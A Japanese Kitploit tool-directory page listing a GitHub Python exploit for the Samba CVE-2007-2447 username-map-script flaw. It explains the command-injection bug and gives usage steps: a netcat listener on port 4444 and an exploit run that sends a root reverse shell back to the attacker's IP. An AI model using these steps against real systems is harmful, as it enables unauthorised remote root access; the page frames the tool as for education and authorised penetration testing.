Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Samba-CVE-2007-2447-Exploit-Username-Map-Script — Samba CVE-2007-2447 エクスプロイト | Kitploit
ツール/GitHubGitHub/daviddoctor/samba-cve-2007-2447-exploit-username-map-script
脆弱性分析エクスプロイトペネトレーションテストコマンド&コントロール学習と教育リモートアクセスツール
GitHubdaviddoctor/samba-cve-2007-2447-exploit-username-map-script

Samba-CVE-2007-2447-Exploit-Username-Map-Script

Samba CVE-2007-2447 エクスプロイト

リポジトリを見る
24ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Samba CVE-2007-2447 Exploit(ユーザ名マップスクリプト)

このリポジトリには、Sambaサーバ(バージョン3.0.20~3.0.25rc3)における脆弱性 CVE-2007-2447 の悪用を自動化するPythonスクリプトが含まれています。このツールは、教育目的および許可された侵入テストのためにのみ開発されています。

📝 技術的・学術的説明

「ユーザ名マップスクリプト」 の脆弱性は、Samba設定で username map script オプションが有効になっている場合に、ユーザ名入力のサニタイズが欠如しているために発生します。シェルのメタ文字(バッククォート ` やサブシェル $() など)を含むユーザ名を送信すると、サーバはそのコマンドをサービス権限(多くの場合 root)で実行します。

🚀 必要条件

  • オペレーティングシステム: Kali Linux / Parrot OS(または smbclient がインストールされた任意のLinux)
  • 言語: Python 3.x
  • 依存関係: smbclient(システムのPATHに存在する必要があります)

🛠️ インストールと使用方法

  1. リポジトリのクローン:
    root@kitploit:~
    git clone [https://github.com/Daviddoctor/Samba-CVE-2007-2447-Exploit-Username-Map-Script-.git]
    cd samba-exploit-cve-2007-2447
    
  2. 実行権限の付与:
    root@kitploit:~
    chmod +x exploit.py
    
  3. リスナーの準備(Kali Linux):
    root@kitploit:~
    nc -lvnp 4444
    
  4. エクスプロイトの実行:
    root@kitploit:~
    ./exploit.py <ターゲットIP> <自身のKali IP> -p 4444
    
ツールをダウンロード